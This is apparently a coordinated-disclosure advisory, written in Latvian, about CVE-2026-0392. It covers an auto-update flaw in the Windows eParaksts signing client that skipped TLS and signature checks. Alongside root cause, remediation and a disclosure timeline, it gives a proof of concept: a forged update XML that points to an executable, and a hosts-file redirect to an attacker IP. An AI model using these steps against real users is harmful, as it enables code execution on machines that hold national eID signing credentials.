Attālināta koda izpilde Latvijas nacionālajā eID parakstīšanas programmatūrā
eParakstītājs 3.0 (Windows, < 1.10.0)
CVE-2026-0392 ir attālinātas koda izpildes ievainojamība, ko OffSeq atklāja lietotnē eParakstītājs 3.0 – eParaksts Windows klientā, kas ir Latvijas nacionālais elektroniskā paraksta pakalpojums. Katrā palaišanas reizē lietotne lejupielādēja un izpildīja savus atjauninājumus pa kanālu bez sertifikāta validācijas, bez paraksta un bez kontrolsummas, tādēļ tīkla uzbrucējs, kas spēj novirzīt www.eparaksts.lv, varēja piegādāt paša izvēlētu izpildāmo failu un panākt, ka klients to palaiž. LVRTC to novērsa versijā 1.10.0.
Kritiskums: AugstsCVSS7.3CVE-2026-03925 min lasīšanai
CVSS 4.0 vērtējums sadalās trīs daļās: kā uzbrukums tiek veikts, ko tas nodara skartajai sistēmai un cik tālu bojājums izplatās uz citām sistēmām.
Cik grūti to izmantot
Ietekme uz skarto sistēmu
Ietekme uz citām sistēmām
Izvēlieties metriku, lai redzētu, ko tā nozīmē
CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
§ 01. Pārskats
eParakstītājs 3.0 ir eParaksts Windows darbvirsmas klients – Latvijas nacionālais elektroniskā paraksta pakalpojums, ko nodrošina VAS "Latvijas Valsts radio un televīzijas centrs" (LVRTC). Iedzīvotāji un organizācijas to izmanto juridiski saistošu elektronisko parakstu veidošanai ar saviem eID akreditācijas datiem, tādēļ tā ir nacionāla uzticamības pakalpojumu infrastruktūra, nevis parasta darbvirsmas lietotne.
OffSeq atklāja, ka lietotnes automātiskās atjaunināšanas mehānisms ieguva un izpildīja kodu pa kanālu, kas nebija ne autentificēts, ne integritātes ziņā aizsargāts. Starpnieks (MITM), kas spēj novirzīt www.eparaksts.lv, varēja piegādāt īpaši izveidotu atjauninājumu, kas norāda uz paša izvēlētu izpildāmo failu, un klients to lejupielādēja un palaida – patvaļīga koda izpilde upura datorā. LVRTC ievainojamību novērsa versijā 1.10.0, un tā tiek uzskaitīta kā CVE-2026-0392.
§ 02. Atjaunināšanas mehānisms
Katrā palaišanas reizē eParakstītājs 3.0 pieprasa atjauninājuma aprakstu – XML dokumentu – no fiksētas adreses:
https://www.eparaksts.lv/files/ep3updates/eparakstitajs3-update-win64.xmlApraksts norāda versiju un atbilstošā instalētāja (.exe vai .msi) adresi. Ja norādītā versija ir jaunāka par uzstādīto, klients šo instalētāju lejupielādē un izpilda ar Runtime.exec. Viss process ir automātisks; tam nav nepieciešama nekāda darbība, izņemot lietotnes palaišanu.
Šāds risinājums ir drošs tikai tad, ja izpildās divi nosacījumi: klientam ir jāsasniedz īstais serveris pa pienācīgi validētu TLS savienojumu, un tam ir jāpārliecinās, ka gan apraksts, gan instalētājs ir autentiski un nemainīti, pirms tiek kaut kas izpildīts. eParakstītājs 3.0 neievēroja nevienu no tiem.
§ 03. Cēlonis: trūkstošās pārbaudes
Četras neatkarīgas pārbaudes, kas šim atjaunināšanas kanālam ir nepieciešamas, visas bija izlaistas:
| Nepieciešamā pārbaude | Kur tā izpaliek | Novērotā uzvedība |
|---|---|---|
| TLS sertifikāta validācija | util/h.java | TrustManager pieņem jebkuru sertifikātu |
| Servera nosaukuma pārbaude | util/g.java | HostnameVerifier vienmēr atgriež true |
| Parakstīts atjauninājuma apraksts | AppInstaller.java:149 | XML nav digitāli parakstīts |
| Instalētāja paraksts / kontrolsumma | installer/j.java:165-185 | lejupielādētā faila Authenticode paraksts un kontrolsumma netiek pārbaudīti |
Pirmās divas nozīmē, ka TLS nesniedz nekādu aizsardzību: pielaidīgs TrustManager pieņem jebkuru sertifikātu, un HostnameVerifier, kas vienmēr atgriež true, pieņem jebkuru servera nosaukumu. Tādēļ jebkura puse, kas atrodas tīkla ceļā – vai spēj novirzīt www.eparaksts.lv nosaukuma atrisināšanu –, var noslēgt "HTTPS" savienojumu ar pašparakstītu sertifikātu un uzdoties par serveri.
Pēdējās divas nozīmē, ka slodze tiek uzticēta bez pārbaudes. Tā kā apraksts nav parakstīts, uzbrucējs to var brīvi pārrakstīt; tā kā lejupielādētā instalētāja Authenticode paraksts netiek pārbaudīts (un kontrolsummas nav), klients nespēj atšķirt LVRTC parakstīto instalētāju no uzbrucēja neparakstīta izpildāmā faila. Nekas turpmākajā ķēdē neatjauno autentiskumu, ko TLS bija paredzēts garantēt.
§ 04. Koncepcijas pierādījums
Ievainojamība tika demonstrēta no sākuma līdz beigām pret eParakstītājs 3.0:
- Sagatavo jebkādu
poc.exe– mūsu gadījumā tas vienkārši ieraksta datora ierīces datus failāC:\Windows\Temp\eparaksts-rce-poc.txtkā nekaitīgu izpildes pierādījumu. - Palaiž HTTPS serveri ar pašparakstītu sertifikātu portā 443, kas uz apraksta pieprasījumu
/files/ep3updates/eparakstitajs3-update-win64.xmlatgriež versiju, kas ir daudz augstāka par uzstādīto, un norāda uz slodzi:
<update version="9.9.9" minversion="1.0.0"
uri="https://www.eparaksts.lv/files/ep3updates/poc.exe">
<upgrade version="9.9.9"
uri="https://www.eparaksts.lv/files/ep3updates/poc.exe"/>
</update>- Novirza nosaukumu uz uzbrucēju upura datorā (aizstājot ARP viltošanu, ļaunprātīgu piekļuves punktu vai "ļaunā dvīņa" tīklu):
<uzbrucēja IP> www.eparaksts.lv- Palaiž eParakstītājs 3.0.
Aptuveni divas sekundes pēc palaišanas serveris saņēma divus pieprasījumus – aprakstu un pēc tam poc.exe –, un upura sistēmā parādījās fails C:\Windows\Temp\eparaksts-rce-poc.txt. Pašparakstītais sertifikāts tika pieņemts, neparakstītais apraksts tika uzticēts, un neparakstītais izpildāmais fails tika lejupielādēts un palaists: patvaļīga koda izpilde, ko panāk, tikai palaižot lietotni.
§ 05. Ietekme un kritiskums
Publicētie rādītāji ir CVSS 4.0 bāzes vērtība 7.3 (augsts), vektors CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Uzbrukuma vektors ir blakusesošs (AV:A): reālās pozīcijas ir upura tīklā – ARP viltošana, ļaunprātīgs piekļuves punkts vai "ļaunais dvīnis" –, nevis patvaļīga sasniedzamība visā internetā. Uzbrukuma sarežģītība ir zema, privilēģijas nav nepieciešamas, un vienīgā lietotāja mijiedarbība (UI:A) ir lietotnes palaišana, kas ir tās normālais lietojums. Ietekme uz skartās sistēmas konfidencialitāti, integritāti un pieejamību ir augsta, kas atbilst patvaļīgai koda izpildei lietotāja kontekstā.
Izvērtēšanas laikā kritiskums sākotnēji tika novērtēts kā lokāls (AV:L), bet pēc tam pārskatīts uz iepriekš minēto blakusesošo vektoru; dators, ko izmanto juridiski saistošiem parakstiem, ir tieši tas resurss, kuru uzbrucējs vēlas, jo koda izpilde lietotāja kontekstā atrodas blakus eID kartei, PIN ievadei un parakstīšanas darbībām. Tieši šī kombinācija – kritisks primitīvs, kas sasniedzams no ticamas tīkla pozīcijas, uzticamības pakalpojumu programmatūrā un ko izraisa parasts lietojums – padara atradumu nopietnu, kaut arī tas nav tieši pieejams no interneta.
§ 06. Novēršana
Drošam automātiskās atjaunināšanas kanālam katrā slānī no jauna ir jāapstiprina autentiskums, ko ievainojamā versija pieņēma par pašsaprotamu. Trīs izmaiņas novērš nepilnību:
- Atjaunot TLS validāciju. Izmantot platformas noklusējuma
TrustManagerun patiesu servera nosaukuma pārbaudi un apsvērt sertifikāta piesaisti (pinning)www.eparaksts.lv, lai pašparakstīts vai neatbilstošs sertifikāts tiktu noraidīts, nevis pieņemts. - Parakstīt atjauninājuma aprakstu. Pievienot XML digitālo parakstu un pārbaudīt to klienta pusē, lai versiju un instalētāja adresi nevarētu pārrakstīt pārraides laikā.
- Pārbaudīt instalētāju pirms palaišanas. Ar
WinVerifyTrustpārbaudīt lejupielādētā faila Authenticode parakstu, apstiprināt, ka izdevējs ir LVRTC/EUSO, un pirms izpildes validēt kontrolsummu.
LVRTC ieviesa autentificētu un ar parakstu pārbaudītu atjaunināšanas kanālu eParakstītājs 3.0 versijā 1.10.0, kas izlaista 2026. gada 9. jūlijā. Kamēr klients nav atjaunināts, automātiskos atjauninājumus var atspējot un jaunas versijas uzstādīt tikai no oficiālās parakstītās pakotnes, kas iegūta uzticamā tīklā, manuāli pārbaudot Authenticode parakstu.
§ 07. Atklāšana un iznākums
Ievainojamība tika paziņota CERT.LV 2026. gada 12. maijā, izvērtēta un pārsūtīta LVRTC, un novērtēta kā augsta kritiskuma. LVRTC izstrādāja un izlaida labojumu versijā 1.10.0 2026. gada 9. jūlijā; CVE-2026-0392 tika rezervēts 10. jūlijā un publicēts 2026. gada 4. augustā, kad koordinētā atklāšana tika noslēgta.
Atradums tiek attiecināts uz Nilu Putniņu (OffSeq Cybersecurity), un atklāšanu koordinēja CERT.LV.
§ 08. Atklāšanas hronoloģija
- 2026-05-12OffSeq ziņo CERT.LV par neautentificētas automātiskās atjaunināšanas RCE
- 2026-05-13CERT.LV izvērtē ziņojumu un pārsūta LVRTC; kritiskums noteikts kā augsts (CVSS 4.0, 7.3)
- 2026-06-17CERT.LV eskalē ražotājam; apstiprināts, ka labojums ir izstrādē
- 2026-07-09Izlaista eParakstītājs 3.0 versija 1.10.0 ar labojumu
- 2026-07-10Rezervēts CVE-2026-0392
- 2026-08-04Publicēts CVE-2026-0392; atklāšana noslēgta
